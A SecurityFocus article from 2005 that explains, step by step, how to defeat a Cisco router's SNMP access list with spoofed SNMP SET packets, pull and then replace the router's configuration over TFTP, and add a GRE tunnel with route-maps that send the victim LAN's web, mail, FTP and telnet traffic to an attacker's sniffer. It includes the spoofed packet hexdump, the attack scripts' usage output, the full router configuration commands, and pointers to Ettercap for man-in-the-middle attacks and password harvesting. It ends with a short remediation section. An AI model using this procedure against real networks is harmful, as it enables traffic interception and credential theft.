
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" 
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="description" content="SecurityFocus is designed to facilitate discussion on computer security related topics, create computer security awareness, and to provide the Internet&amp;apos;s largest and most comprehensive database of computer security knowledge and resources to the public. It also hosts the BUGTRAQ mailing list.">
<meta name="keywords" content="router,attacker,victim,figure,config,access,tunnel,address,route,configuration,small,packet,sniffer,interface,server,traffic,source,cisco,12285992,cccopytable,security">
<script language="JavaScript">
var pathname='/infocus';
var OAS_listpos = 'Top,Middle,Right1,x30,x28';
</script>
<SCRIPT LANGUAGE="JavaScript1.2" SRC="/js/standard.js"></SCRIPT>
<script src="/__utm.js" type="text/javascript"></script>
<link rel="stylesheet" type="text/css" href="/new_SFPS_style.css" />
<title>Cisco SNMP configuration attack with a GRE tunnel</title>

</head>

<body bgcolor="#ffffff">
<map name="ButtonMap">
  <area shape="rect" coords="23,25,68,45" href="/about">
  <area shape="rect" coords="97,25,169,45" href="/advertise">
  <area shape="rect" coords="191,25,249,45" href="/contact">
</map>
<!-- start header -->

<a href="/"><div id="logo_new">
		<div class="headerButtonBar"><img src="/images/site/header_button_bar.gif" width="258" height="45" alt="" usemap="#ButtonMap" border="0"></div>
</div></a>
<div id="bannerAd">
<table width="890" cellpadding="0" border="0" cellspacing="0">
<tr><td width="728">
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<NOSCRIPT>
<a href="http://adserver.securityfocus.com/RealMedia/ads/click_nx.cgi/www.securityfocus.com/home@Top" target="_blank"><FONT size="1">[AD]</FONT><AD- ityfocus.com/RealMedia/ads/adstream_nx.cgi/www.securityfocus.com/home@Top" border=0 width="728" height="90" alt=""></a>
</NOSCRIPT>
</td>
<td width="12">&nbsp;</td>
<td width="150" align="right">
<div id="threatcon">
<table align="center" width="150" border="0" cellspacing="0" cellpadding="0">
<tr>
<td bgcolor="#FFFFFF" align="center"><img alt="" src="/images/threatcon/threatcon_level1.gif" border="0" width="141" height="58"></td>
</tr>
<tr>
	<td align="center" class="date"><a href="http://www.symantec.com/avcenter/threatcon/learnabout.html" target="_blank">Threat level definition</a></td>
</tr>
</table>
</div>

<td>
</tr>
</table>

</div>
<div id="header_bar">
<form name="search" action="/swsearch" style="margin: 0px;">
<input type="hidden" name="sbm" value="/">
<input type="hidden" name="metaname" value="alldoc">
		<span class="search">Search: <input type="text" name="query" size="30"> 
		<input type="image" src="/images/site/search.gif" border="0"></span>
	<span class="header_button"><a href="/">Home</a></span>
	<span class="header_button"><a href="/archive/1">Bugtraq</a></span>
	<span class="header_button"><a href="/vulnerabilities">Vulnerabilities</a></span>
	<span class="header_button"><a href="/archive">Mailing Lists</a></span>
	<span class="header_button"><a href="/jobs">Security Jobs</a></span>
	<span class="header_button"><a href="/tools">Tools</a></span>
</form>
</div>

<!-- end header -->

<table width="900" cellpadding="0" cellspacing="4" border="0">
	<tr valign="top">
		<td width="120">
			<!-- Start navigation -->
			<div id="nav">
			<ul>
				<li class="header"><a href="/news">News</a></li>
				<li class="header"><a href="/infocus">Infocus</a></li>
					<li class="entry"><a href="/foundations">Foundations</a></li>
					<li class="entry"><a href="/microsoft">Microsoft</a></li>
					<li class="entry"><a href="/unix">Unix</a></li>
					<li class="entry"><a href="/ids">IDS</a></li>
					<li class="entry"><a href="/incidents">Incidents</a></li>
					<li class="entry"><a href="/virus">Virus</a></li>
					<li class="entry"><a href="/pen-test">Pen-Test</a></li>
					<li class="entry"><a href="/firewalls">Firewalls</a></li>
				<li class="header"><a href="/vista">Focus On: Vista</a></li>
				<li class="header"><a href="/columnists">Columnists</a></li>
				<li class="header"><a href="/archive">Mailing Lists</a></li>
                    <li class="entry"><a href="/newsletters">Newsletters</a></li>
                    <li class="entry"><a href="/archive/1">Bugtraq</a></li>
                    <li class="entry"><a href="/archive/96">Focus on IDS</a></li>
                    <li class="entry"><a href="/archive/91">Focus on Linux</a></li>
                    <li class="entry"><a href="/archive/88">Focus on Microsoft</a></li>
                    <li class="entry"><a href="/archive/104">Forensics</a></li>
                    <li class="entry"><a href="/archive/101">Pen-test</a></li>
                    <li class="entry"><a href="/archive/105">Security Basics</a></li>
                    <li class="entry"><a href="/archive/82">Vuln Dev</a></li>
				<li class="header"><a href="/vulnerabilities">Vulnerabilities</a></li>
				<li class="header"><a href="/jobs">Jobs</a></li>
					<li class="entry"><a href="/jobs/opportunities">Job Opportunities</a></li>
					<li class="entry"><a href="/jobs/resumes">Resumes</a></li>
					<li class="entry"><a href="/jobs/seekers">Job Seekers</a></li>
					<li class="entry"><a href="/jobs/employers">Employers</a></li>
				<li class="header"><a href="/tools">Tools</a></li>
				<li class="header"><a href="/rss">RSS</a></li>
					<li class="entry"><a href="/rss/news.xml">News</a></li>
					<li class="entry"><a href="/rss/vulnerabilities.xml">Vulns</a></li>
			</ul>
			</div>

			<!-- End navigation -->
		</td>
		<td>
			<!-- Start Content -->

<div id="articleTools">
	<span class="tools">
		<a href="/print/infocus/1847" onClick="openPrintable(this.href); return false;"><img src="/images/site/print.gif" width="55" height="20" alt="" border="0"></a> &nbsp;
		<a href="/email/infocus/1847" onClick="openEmail(this.href); return false;"><img src="/images/site/email.gif" width="51" height="20" alt="" border="0"></a> &nbsp;
		<a href="#comments"><img src="/images/site/comment.gif" width="73" height="20" alt="" border="0"></a> &nbsp;
		<a href="http://digg.com/submit?phase=2&url=http://securityfocus.com/infocus/1847&title=Cisco%20SNMP%20configuration%20attack%20with%20a%20GRE%20tunnel&bodytext=&topic=security" target="_blank"><img src="/images/site/digg.gif" width="20" height="20" alt="Digg this story" border="0"></a> &nbsp;
		<a href="http://del.icio.us/post?url=http://securityfocus.com/infocus/1847&title=Cisco SNMP configuration attack with a GRE tunnel"><img src="/images/site/delicious.gif" width="18" height="18" alt="Add to del.icio.us" border="0"></a> &nbsp;
	</span>
	<span class="pages">
	
	</span>
</div>
<div id="article">
	<span class="headline">Cisco SNMP configuration attack with a GRE tunnel</span><br />
	<span class="author"><a href="mailto:mati@see-security.com, redkommie@gmail.com">Mati Aharoni, William M. Hidalgo</a></span> 
	<span class="date">2005-09-16</span><br />
	
	<p class="firstParagraph">
		
	</p>
	
	<span class="body">
		<h2>Introduction</h2>

Throughout our education as system administrators, SNMP is often a topic that eludes us. One might have a vague understanding of what it's used for, and a general sense of security around some vague concept that it's read-only information.

<p>

It is easy to be surprised when one first sees the output of an SNMP enumeration tool such as <a href="http://www.filip.waeytens.easynet.be/snmpenum.zip">SNMP-Enum</a> (by <a href="http://www.filip.waeytens.easynet.be/">Filip Waeytens</a>), when it's run against a Windows 2000 Server with the default SNMP service enabled.  The wealth of information collected might leave an administrator stumped, and soon realize that SNMP holds many possibilities within.

<p>

SNMP may just remind the reader of the movie "The Matrix" in the way it's used to constantly probe devices, looking for anomalies. Remember when Neo takes the red pill, and the Matrix spits him out as a reject? Think of a final SNMP SET command as the one that opens Neo's bio chamber doors...

<p>

The fact that SNMP is based on UDP makes it that much more interesting. Being a connectionless protocol, UDP is vulnerable to IP spoofing attacks.  With a couple of Cisco routers in your organization, you're ready to do some testing and see what can be done in Cisco land.

<h2>The scenario</h2>

Without further ado, let's setup our sample configuration attack scenario, as shown below in Figure 1.

<p>

<div align="center">
<img src="/images/infocus/ciscofun1.jpg" alt="Figure 1." border="0"><br>
<small>Figure 1. Sample configuration attack scenario.</small>
</div>

<p>

Take time to learn the scenario, and get familiar with the naming of the elements. For reference, the current Victim router configuration can be seen below:

<p>

<div class="code">
<pre>Current configuration : 1206 bytes
!
version 12.3
!
hostname Victim
!
enable secret 5 $1$h2iz$DHYpcqURF0APD2aDuA.YX0
!
interface Ethernet0/0 
 ip address dhcp 
 ip nat outside 
 half-duplex
!
interface Ethernet0/1 
 ip address 192.168.1.1 255.255.255.0 
 ip nat inside 
 half-duplex
!
router rip 
 network 192.168.1.0
!
ip nat inside source list 102 interface Ethernet0/0 overload
no ip http server
ip classless
!
access-list 1 permit 192.168.1.0 0.0.0.255
access-list 102 permit ip any any
!
snmp-server community public RO
snmp-server community private RW 1
snmp-server enable traps tty
!
line con 0 
 logging synchronous
 login
line aux 0
line vty 0 4 
 password secret 
 login
!
!
end</pre></div>

<p>

Notice the access list on the RW community string. This access list attempts to limit SNMP read/write access only to the internal LAN address space (192.168.1.0).

<p>

The attack vector is comprised of two main stages:
<p>

<ol>
<li>Bypassing the SNMP access lists of the Victim's Cisco router in order to get access to the router configuration file. </li>
<li>Creating a GRE tunnel between the Victim router and the Attacking router in order to remotely sniff the Victim client's traffic.</li>
</ol>


<h2>The theory</h2>

As discussed in "<a href="http://www.securityfocus.com/infocus/1734">Exploiting Cisco Routers, Part 1</a>" it is possible to get a Cisco router to pull/send its configuration file with TFTP, using an SNMP SET command.

<p>

By sending an SNMP set request with a spoofed source IP address (from the RFC1918 range-192.168.1.0), we should be able to get the Victim router to send us its configuration file. This is assuming we know the private community string, as well as the ACLs implemented on the SNMP RW community string. 


<h2>Bypassing the SNMP access list</h2>

Lets start by creating our forged SNMP request.  Using a nifty little Perl script and Ethereal, we capture a standard "copy config" SNMP SET request, which we can use as a baseline packet. 

<p>

<div class="code"><pre>root@whax# ./copy-router-config.pl
 
######################################################
# Copy Cisco Router config  - Using SNMP
# Hacked up by muts - muts@whitehat.co.il
#######################################################

Usage : ./cisco-copy-config.pl <router-ip> <tftp-serverip> <community>

Make sure a TFTP server is set up, preferably running from /tmp !

root@whax#</pre></div>

<p>

Once executed, the following SNMP packet is captured and shown below in Figure 2.. As expected, this request is declined by the router, and no configuration file is sent.

<p>

<div align="center">
<img src="/images/infocus/ciscofun2.jpg" alt="Figure 2." border="0"><br>
<small>Figure 2. Captured SNMP packet.</small>
</div>

<p>

Notice the attacker's source IP address (80.179.76.227). Now, Using a hex editor, we change the source IP address, and fix the packet headers. C0 A8 01 05 (in hex) represents our spoofed source IP address, 192.168.1.5, as shown below in Figure 3.

<p>

<div align="center">
<img src="/images/infocus/ciscofun3.jpg" alt="Figure 3." border="0"><br>
<small>Figure 3. Changing the source IP address of the packet.</small>
</div>

<p>

We then send the packet using <a href="http://www.phenoelit.de/irpas/docu.html">file2cable</a> (or any packet generator):

<p>

<div class="code"><pre>root@whax:~# file2cable -v -i eth0 -f /root/snmp-mod

file2cable - by FX <fx@phenoelit.de>
Thanx go to Lamont Granquist & fyodor for their hexdump()
/root/snmp-mod - 238 bytes raw data

		 000f 347c 501f 0006 1bcc 00fa 0800 4500  ..4|P.........E.
		 00e0 0000 4000 4011 35bd c0a8 0105 d4c7  ....@.@.5.......
		 91f2 8000 00a1 00cc 052e 3081 c102 0100  ..........0.....
		 0407 7072 6976 6174 65a3 81b2 0203 00d6  ..private.......
		 9b02 0100 0201 0030 81a4 3016 0611 2b06  .......0..0...+.
		 0104 0109 0960 0101 0101 0283 f1b0 7802  .....`........x.
		 0101 3016 0611 2b06 0104 0109 0960 0101  ..0...+......`..
		 0101 0383 f1b0 7802 0104 3016 0611 2b06  ......x...0...+.
		 0104 0109 0960 0101 0101 0483 f1b0 7802  .....`........x.
		 0101 3019 0611 2b06 0104 0109 0960 0101  ..0...+......`..
		 0101 0583 f1b0 7840 0450 b34c e330 2706  ......x@.P.L.0'.
		 112b 0601 0401 0909 6001 0101 0106 83f1  .+......`.......
		 b078 0412 7077 6e64 2d72 6f75 7465 722e  .x..pwnd-router.
		 636f 6e66 6967 3016 0611 2b06 0104 0109  config0...+.....
		 0960 0101 0101 0e83 f1b0 7802 0104       .`........x...
Packet length: 238
root@whax:~#</pre></div>

<p>

Soon after, our TFTP server gets a connection, shown in the Ethereal capture in Figure 4.

<p>

<div align="center">
<img src="/images/infocus/ciscofun4.jpg" alt="Figure 4." border="0"><br>
<small>Figure 4. Ethereal showing a connection to the TFTP server.</small>
</div>

<p>

Notice the source IP for the SNMP request, and the TFTP write Request (packets 1 and 2). The packet bypasses the SNMP access list, and we get the Victim router configuration file by TFTP.


<h2>The GRE tunnel</h2>

<b>Generic Routing Encapsulation</b> (GRE) is a tunneling protocol designed for encapsulation of arbitrary kinds of network layer packets inside arbitrary kinds of network layer packets. One common use for GRE is to connect IPX network segments over an IP only backbone. In this case you would create a GRE tunnel from one router to the next to transport the IPX packets back and forth over the IP backbone. 

<p>

For our purposes, however, we need a twist on the standard usage of GRE tunneling. The plan is to do the following:

<p>

<ul>
<li>Create the GRE tunnel from the Victim border router to the attacker router.
<li>Specify which traffic will be sent through the tunnel.
<li>Have the attacker router decapsulate the GRE packets and forward them to the attacking (sniffer) computer for analysis.
</ul>


<h2>The Victim router</h2>

We need to create the GRE tunnel on the victim router. Since we don't have console / terminal access to this router, we can simply edit the downloaded configuration file, and once it's ready, merge it back to the router using a spoofed SNMP SET request.

<p>

We add the following lines to the victim router configuration file:

<p>

<div class="code"><pre>interface tunnel0
ip address 192.168.10.1 255.255.255.0
tunnel source Ethernet0/0
tunnel destination <attacking router IP>
tunnel mode gre ip</pre></div>

<p>

What this is means is that:

<p>

<ul>
<li>We create the tunnel0 interface and specify an IP address from the 192.168.10.x network. Both sides of the tunnel need to be in the same network in order for them to communicate.
<li>We specify the Ethernet0/0 interface as the tunnel source (otherwise where would the tunnel start from?).
<li>The tunnel destination is the IP of the attacker's border router external interface.
<li>The final command is optional since the tunnel will default to GRE (we type it in just to make sure).
</ul>

<p>

We can now configure <i>access-lists</i> to specify which traffic is to be forwarded, and route-maps to actually perform the packet forwarding.

<p>

We add the following lines to the victim router configuration file:

<p>

<div class="code"><pre>access-list 101 permit tcp any any eq 443
access-list 101 permit tcp any any eq 80
access-list 101 permit tcp any any eq 21
access-list 101 permit tcp any any eq 20
access-list 101 permit tcp any any eq 23
access-list 101 permit tcp any any eq 25
access-list 101 permit tcp any any eq 110</pre></div>

<p>

This means that this access-list will match SSL, http, ftp-control / data, telnet, smtp, and pop3 data. 

<p>

Now that the traffic has been matched it must be redirected using route-maps. We add the following lines to the Victim router configuration file:

<p>

<div class="code"><pre>router-map divert-traffic 
   match ip address 101
   set ip next-hop 192.168.10.2
interface Ethernet0/0
   ip policy route-map divert-traffic</pre></div>

<p>

Which means:

<p>

<ul>
<li>We specify a name for the route map (divert-traffic) and then use the match command to use access-list 101 as the match condition. 
<li>We specify the GRE tunnel IP address of the Attacker as the next hop IP. 
<li>We apply the route-map on the victim's internal LAN interface. This will cause it to evaluate all traffic coming in and out of the Ethernet0/0.
</ul>


<h2>The Attacking router</h2>

The configuration to be used on the attacking router is a bit more elaborate since we need to specify two route-maps - one to send traffic to attacker (sniffer) and a second to send traffic back to the Victim router for normal forwarding.  It is crucial that we forward the tunneled data back to the Victim router so the client victim does not lose connectivity. 

<p>

We start by creating the GRE tunnel on the attacker's router:

<p>

<div class="code"><pre>Attacker(config)# interface tunnel0
Attacker(config-if)# ip address 192.168.10.2 255.255.255.0
Attacker(config-if)# tunnel source Ethernet0/0
Attacker(config-if)# tunnel destination <victim router IP>
Attacker(config-if)# tunnel mode gre ip

Attacker(config)# access-list 101 permit ip any any
Attacker(config)# router-map divert-to-sniffer
Attacker(config-route-map)# match ip address 101
Attacker(config-route-map)# set ip next-hop 192.168.3.5
Attacker(config-route-map)# exit
Attacker(config)# interface tunnel0
Attacker(config-if)# ip policy route-map divert-to-sniffer</pre></div>

<p>

Which means:

<p>

<ul>
<li>We create an access list to match all traffic.
<li>We create the route-map and give it the name divert-to-sniffer (this route-map will forward tunneled data to the sniffer). 
<li>The access-list is used as a match condition. 
<li>We specify the attacker's (sniffer) IP as the next hop. 
<li>We apply the route-map to the tunnel interface.
</ul>

<p>

It is very important we use a route-map to forward the data. The router receives the tunneled data in GRE encapsulation, which we can't view without decoding the packets. By redirecting received packets out onto the attacker (sniffer), the router will forward the packets as standard IP packets without the GRE encapsulation. 

<p>

Lastly, we create the route-map, and associate it with the Ethernet0/0 interface:

<p>

<div class="code"><pre>Attacker(config-if)# route-map divert-out
Attacker(config-route-map)# match ip address 101
Attacker(config-route-map)# set ip next-hop 192.168.10.1
Attacker(config-route-map)# exit
Attacker(config)# interface ethernet0/0
Attacker(config-if)# ip policy route-map divert-out</pre></div>

<p>

This additional configuration means:

<p>

<ul>
<li>The <i>divert-out</i> route-map will forward the tunneled data back to the Victim router after the attacker (sniffer) has captured and forwarded it back out. 
<li>We apply the route-map to the Ethernet interface.
</ul>


<h2>The Attacker (Sniffer) </h2>

After completing all necessary router configurations we need to configure the attacker's computer (the sniffer) to capture and forward data correctly. The computer must be configured with an IP address and a gateway. It is vital that the computer be configured to forward packets back out using either one of the following commands:

<p>

<div class="code"><pre>root@whax:~# echo 1 > /proc/sys/net/ipv4/ip_forward

-or-

root@whax:~# fragrouter -B1</pre></div>

<p>

Without the forwarding, the Victim client will be DoS'ed, rendering this attack useless. 


<h2>Initiating the attack</h2>

Once everything is configured, all that's left to do is to upload the new, modified victim router configuration file. This will effectively activate the GRE tunnel and redirect all traffic from the victim client's LAN, to the attacker (sniffer).

<p>

We create a spoofed SNMP SET request which kindly asks the router to get its new configuration file from our TFTP server, and merge it with its current configuration. Again, we use a non-spoofed request as our packet baseline:

<p>

<div class="code"><pre>root@whax# ./merge-router-config.pl

######################################################
# Merge Cisco Router config  - Using SNMP
# Hacked up by muts - muts@whitehat.co.il
#######################################################

Usage : ./merge-copy-config.pl <router-ip> <tftp-serverip> <community>

Make sure a TFTP server is set up, prefferably running from /tmp !

root@whax#</pre></div>

<p>

We capture this packet, and modify its source IP address and packet headers as shown in Figure 5.

<p>

<div align="center">
<img src="/images/infocus/ciscofun5.jpg" alt="Figure 5." border="0"><br>
<small>Figure 5. Modifying the packet headers.</small>
</div>

<p>

Once sent, we see that a TFTP connection is made to our attacking computer in Figure 6.

<p>
 
 <div align="center">
<img src="/images/infocus/ciscofun6.jpg" alt="Figure 6." border="0"><br>
<small>Figure 6. Connection to the Victim's TFTP server.</small>
</div>

<p>

Notice the TFTP Read Request (packet 2). Once again, the packet bypasses the SNMP access list and pulls/merges the modified configuration file by TFTP. The Victim router debug information gives some interesting insight into the attack:

<p>

<div class="code"><pre>*Mar  1 00:32:53.854: SNMP: Set request, reqid 36323, errstat 0, erridx 0
ccCopyTable.1.2.12285992 = 1
ccCopyTable.1.3.12285992 = 4
ccCopyTable.1.4.12285992 = 1
ccCopyTable.1.5.12285992 = 80.179.76.227 <i>(the address of the TFTP server)</i>
ccCopyTable.1.6.12285992 = pwnd-router.config
ccCopyTable.1.14.12285992 = 4
*Mar  1 00:32:53.971: SNMP: Response, reqid 36323, errstat 0, erridx 0
ccCopyTable.1.2.12285992 = 1
ccCopyTable.1.3.12285992 = 4
ccCopyTable.1.4.12285992 = 1
ccCopyTable.1.5.12285992 = 80.179.76.227  <i>(the address of the TFTP server)</i>
ccCopyTable.1.6.12285992 = pwnd-router.config
ccCopyTable.1.14.12285992 = 4
*Mar  1 00:32:54.291: SNMP: Packet sent via UDP to 192.168.1.5</pre></div>

<p>

Notice that the TFTP server address is a separate parameter from the attacker's source IP address (as opposed to most TCP based traffic). The tunnel is now open and operational, and effectively resembles the diagram below in Figure 7.

<p>

<div align="center">
<img src="/images/infocus/ciscofun7.jpg" alt="Figure 7." border="0"><br>
<small>Figure 7. An operational GRE tunnel.</small>
</div>

<p>

We can verify the operation of the tunnel by issuing a debug command on the attacker's router:

<p>

<div class="code"><pre>Attacker# debug tunnel
*Mar  3 06:38: Tunnel0: GRE/IP to classify 212.199.145.242
->80.179.20.55 (len=108 type=0x800 ttl=253 tos=0x0)
*Mar  3 06:38: Tunnel0: adjacency fixup, 80.179.20.55
-> 212.199.145.242, tos=0x0
*Mar  3 06:38: Tunnel0: GRE/IP to classify 212.199.145.242
->80.179.20.55 (len=108 type=0x800 ttl=253 tos=0x0)
*Mar  3 06:38: Tunnel0: adjacency fixup, 80.179.20.55
-> 212.199.145.242, tos=0x0g   all</pre></div>

<p>

Suppose the Victim client searches Google for the term "GRE Sniffing," in Figure 8.

<p>

<div align="center">
<img src="/images/infocus/ciscofun8.jpg" alt="Figure 8." border="0"><br>
<small>Figure 8. Victim searching for more information on GRE tunnels.</small>
</div>
<p>

When this happens, the following appears in the ethereal capture on the attacker's computer (the sniffer), showin in Figure 9.

<p>

<div align="center">
<img src="/images/infocus/ciscofun9.jpg" alt="Figure 9." border="0"><br>
<small>Figure 9. Sniffer showing the Google search for GRE tunnels.</small>
</div>

<p>

Apart from using a customized sniffer (such as dsniff) to capture clear-text passwords, we can now implement sophisticated man-in-the-middle attacks against our victim client. Ettercap is a great tool of choice as it will perform a man-in-the-middle attack against both the SSL and SSH encrypted protocols in addition to harvesting other types of passwords.  Traffic can also be manipulated and changed using Ettercap filters.  The possibilities are virtually endless. 


<h2>Conclusions and remediations</h2>

Sometimes, nothing is what it seems. Such is the price for taking the red pill! When dealing with SNMP (or UDP based protocols in general), always be aware of those nasty nooks and crannies which, if forgotten, might leave your network exposed. 

<p>

In this scenario, an additional access list on the TFTP server address (placed on the Victim router) would have sufficed to thwart the attack.  

<p>

The skeptics among us are probably saying, "How would the attacker know about the access list / SNMP RW community name in the first place?"  This could be done with a simple brute force attack, not only with SNMP community names, but also with source IP addresses, and such a tool already exists.

<p>

The point, however, is not so much to prove that this attack is effective as it is to encourage tighter security practices by better understanding the risks involved in UDP based protocols. In no way does this mean Cisco equipment is not secure. Proper configuration and security practices must be enforced to minimize the chance of a security breach. Network administration error is the main cause of security breaches on Cisco equipment!

<p>

For information on hardening Cisco routers visit the NSA website and download the <a href="http://www.nsa.gov/snac/downloads_all.cfm">Router Security Guide</a>. 

<p>

<h2>References</h2>

<a href="http://www.hackingdefined.com/index.php/Articles">http://www.hackingdefined.com/index.php/Articles</a><br>
<a href="http://new.remote-exploit.org/index.php/Router_sniff">http://new.remote-exploit.org/index.php/Router_sniff</a><br>
<a href="http://www.phrack.org/phrack/56/p56-0x0a">http://www.phrack.org/phrack/56/p56-0x0a</a><br>
<a href="http://www.security-protocols.com/whitepapers/routing/GRE_sniffing.doc">http://www.security-protocols.com/whitepapers/routing/GRE_sniffing.doc</a> <br>
<a href="http://www.waeytens.com/">http://www.waeytens.com/</a><br>

<h2>About the authors</h2>

<a href="mailto:mati@see-security.com">Mati Aharoni</a>, MCSES, CCNA, CCSA, HPOV, CISSP, is an expert in several OS platforms, and performs penetration testing,
networking, social engineering and group dynamics. Mati has been in the
technology and information security arena since 1992 and currently works and
trains with various agencies. Mati is also the composer of the <a href="http://www.iwhax.net">WHAX live cd</a>.

<p>

<a href="mailto:redkommie@gmail.com">William M. Hidalgo</a> is a college student interested in the cogwheels of our networked
world. He does work on wireless, security, Cisco, and helps out with the Auditor Security Collection
project. 
<p>
Copyright &copy; 2005, SecurityFocus
		
	</span><br/><br/>
	<div class="authorbio">
SecurityFocus accepts Infocus article submissions from members of the security community. Articles are published based on outstanding merit and level of technical detail. Full submission guidelines can be found at <a href="http://www.securityfocus.com/static/submissions.html">http://www.securityfocus.com/static/submissions.html</a>.
	</div>
</div>
<div id="articleTools">
	<span class="tools">
		<a href="/print/infocus/1847" onClick="openPrintable(this.href); return false;"><img src="/images/site/print.gif" width="55" height="20" alt="" border="0"></a> &nbsp;
		<a href="/email/infocus/1847" onClick="openEmail(this.href); return false;"><img src="/images/site/email.gif" width="51" height="20" alt="" border="0"></a> &nbsp;
		<a href="http://digg.com/submit?phase=2&url=http://securityfocus.com/infocus/1847&title=Cisco%20SNMP%20configuration%20attack%20with%20a%20GRE%20tunnel&bodytext=&topic=security" target="_blank"><img src="/images/site/digg.gif" width="20" height="20" alt="Digg this story" border="0"></a> &nbsp;
		<a href="http://del.icio.us/post?url=http://securityfocus.com/infocus/1847&title=Cisco SNMP configuration attack with a GRE tunnel"><img src="/images/site/delicious.gif" width="18" height="18" alt="Add to del.icio.us" border="0"></a> &nbsp;
	</span>
	<span class="pages">
	
	</span>
</div>

<a name="comments"><img src="/images/site/trans.gif" width="1" height="1" border="0"></a>
			<form name="comments" action="/comments/infocus/1847" method="POST" style="margin: 4px 0px 0px 0px;">
			<input type="hidden" name="op" value="display_comments">
			<input type="hidden" name="c" value="infocuscomments">
			<input type="hidden" name="InfocusID" value="1847">
		<div id="comments_header" style="clear: both;">
			<span class="comments_headerL">Comments</span>
			<span class="comments_headerR">

					Mode: 
					<select name="mode">
					
						<option value="threaded" selected>Threaded</option>
					
					
						<option value="flat">Flat</option>
					
					</select> 
					<input type="submit" value="Go">
			</span>

		</div>
		</form>
		<div id="comments_actions">
				
					<a href="/cgi-bin/index.cgi?c=infocuscomments&op=display_comments&InfocusID=1847&expand_all=true&mode=threaded">Expand all</a> | 
				
					<a href="/comments/infocus/post/1847">Post comment</a>
		</div>

<div id="comments"><div class="condensed"><a href="/comments/infocus/1847/3/threaded#3">Cisco SNMP configuration attack with a GRE tunnel</a> 
	<span class="commentDate">2005-09-22</span><br/>  
	<span class="commentAuthor">Anonymous</span> </div><div class="condensed"><a href="/comments/infocus/1847/13/threaded#13">Cisco SNMP configuration attack with a GRE tunnel</a> 
	<span class="commentDate">2005-10-04</span><br/>  
	<span class="commentAuthor">Wintermute</span> </div><div class="condensed"><a href="/comments/infocus/1847/31/threaded#31">Cisco SNMP configuration attack with a GRE tunnel</a> 
	<span class="commentDate">2005-10-29</span><br/>  
	<span class="commentAuthor">Anonymous</span> </div></div>


<br/><br/>
<script type="text/javascript" src="http://jlinks.industrybrains.com/jsct?sid=254&ct=SEC_FOC_HP_ROS&num=5&layt=1&fmt=simp" language="JavaScript"></script>


			<!-- End Content -->
		</td>
		<td width="160" bgcolor="#eaeaea">
			<!-- Start Advertising -->

			<img src="/images/site/trans.gif" width="168" height="1" alt=""><br/>
			<table align="center" cellpadding="0" cellspacing="0" border="0"><tr><td align="center">
			<span style="padding: 4px;">
					<SCRIPT LANGUAGE=JavaScript>
					<!--
					OAS_AD('Right1');
					//-->
					</SCRIPT>
					<NOSCRIPT>
					<a href="http://adserver.securityfocus.com/RealMedia/ads/click_nx.cgi/www.securityfocus.com/home@Right1" target="_blank"><FONT size="1">[AD]</FONT><AD- ityfocus.com/RealMedia/ads/adstream_nx.cgi/www.securityfocus.com/home@Right1" border=0 alt=""></a>
					</NOSCRIPT>
			</span>
			<br/><br/>
			<span style="padding: 4px;">
					<SCRIPT LANGUAGE=JavaScript>
					<!--
					OAS_AD('x28');
					//-->
					</SCRIPT>
					<NOSCRIPT>
					<a href="http://adserver.securityfocus.com/RealMedia/ads/click_nx.cgi/www.securityfocus.com/home@x28" target="_blank"><FONT size="1">[AD]</FONT><AD- ityfocus.com/RealMedia/ads/adstream_nx.cgi/www.securityfocus.com/home@x28" border=0 alt=""></a>
					</NOSCRIPT>
			</span>
			<br><br>
			<span style="padding: 4px;">
					<SCRIPT LANGUAGE=JavaScript>
					<!--
					OAS_AD('Middle');
					//-->
					</SCRIPT>
					<NOSCRIPT>
					<a href="http://adserver.securityfocus.com/RealMedia/ads/click_nx.cgi/www.securityfocus.com/home@Middle" target="_blank"><FONT size="1">[AD]</FONT><AD- ityfocus.com/RealMedia/ads/adstream_nx.cgi/www.securityfocus.com/home@Middle" border=0 alt=""></a>
					</NOSCRIPT>
			</span>
			</td></tr></table>

			<!-- End Advertising -->
		</td>
	</tr>
</table>
<!-- start footer -->
<table width="900" cellpadding="0" cellspacing="4" border="0">
	<tr valign="top">
		<td width="120">
		&nbsp;
		</td>
		<td>

<p align="center" style="color: #666; font-size: 8pt;"><a href="/privacy">Privacy Statement</a><br>Copyright 2007, SecurityFocus</p>

		</td>
		<td width="160">
		&nbsp;
		</td>
	</tr>
</table>
</body>
</html>

